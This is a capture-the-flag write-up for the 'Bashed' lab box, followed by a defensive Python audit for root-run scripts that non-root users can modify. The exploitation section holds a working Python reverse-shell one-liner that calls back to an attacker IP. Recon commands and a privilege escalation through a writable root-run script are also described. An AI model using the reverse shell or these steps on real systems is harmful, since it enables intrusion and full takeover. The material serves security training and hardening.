# BASHED

[TOC]

## RECON

Carlos:

`sudo nmap -p- -sS --min-rate 5000 -Pn -n -vvv --open 10.10.10.68 -oG ports.gp`

`sudo nmap -p80 -sV -sC --min-rate 5000 -Pn -n -vvv --open 10.10.10.68 -oG ports_recon.txt`

`sudo nmap --script web-scan -p80 10.10.10.68`

```
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-04 04:31 GMT
Nmap scan report for 10.10.10.68
Host is up (0.11s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /php/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_  /uploads/: Potentially interesting folder

Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
```

http://10.10.10.68/dev/phpbash.php --> Interactive web CLI

## EXPLOITATION

Carlos:

http://10.10.10.68/dev/phpbash.php -->

`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

## POST-EXPLOITATION

Carlos:

`sudo -u scriptmanager /bin/bash -i`

`./pspy64` -> I notice that root runs a .py file from /scripts

I put a reverse shell in /scripts/test.py, open an nc listener on my machine, and shortly afterwards I receive a connection and get access to the system as the root user.
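The root-level compromise above comes down to one misconfiguration: root executes scripts out of a directory that a non-root user (scriptmanager) can write to. The following audit, added here as an example and not part of Carlos's notes, flags any script (or its containing directory) that a user other than root could modify; the `/scripts` entries and the uid 1001 are constructed sample data, not values taken from the box.

```python
"""Audit scripts that root executes on a schedule for non-root write access."""
import os
import stat
from dataclasses import dataclass


@dataclass
class Entry:
    path: str
    uid: int   # owner uid
    gid: int   # owner gid
    mode: int  # permission bits, e.g. 0o644


def writable_by_non_root(e: Entry) -> list[str]:
    """Return the reasons a non-root user could modify this entry (empty = safe)."""
    reasons = []
    if e.uid != 0:
        reasons.append(f"owned by uid {e.uid}, not root")
    if e.mode & stat.S_IWGRP and e.gid != 0:
        reasons.append(f"group-writable by gid {e.gid}")
    if e.mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit(entries: list[Entry]) -> dict[str, list[str]]:
    """Map each risky path to its reasons. The directory itself is checked too,
    because write access there lets a user replace the script outright."""
    return {e.path: r for e in entries if (r := writable_by_non_root(e))}


def audit_directory(directory: str) -> dict[str, list[str]]:
    """Run the audit against a real directory tree using os.stat (Linux)."""
    entries = []
    for root, _dirs, files in os.walk(directory):
        for p in [root] + [os.path.join(root, f) for f in files]:
            st = os.stat(p)
            entries.append(Entry(p, st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode)))
    return audit(entries)


# Constructed sample resembling the box: /scripts is owned by a non-root user.
SAMPLE = [
    Entry("/scripts", uid=1001, gid=1001, mode=0o755),
    Entry("/scripts/test.py", uid=1001, gid=1001, mode=0o644),
    Entry("/etc/cron.d/backup.py", uid=0, gid=0, mode=0o644),  # root-owned: fine
]

if __name__ == "__main__":
    for path, why in audit(SAMPLE).items():
        print(f"{path}: {'; '.join(why)}")
```

Running it on a live host (`audit_directory("/scripts")`) turns the pspy observation into a concrete fix: every flagged path should be root-owned and not group- or world-writable.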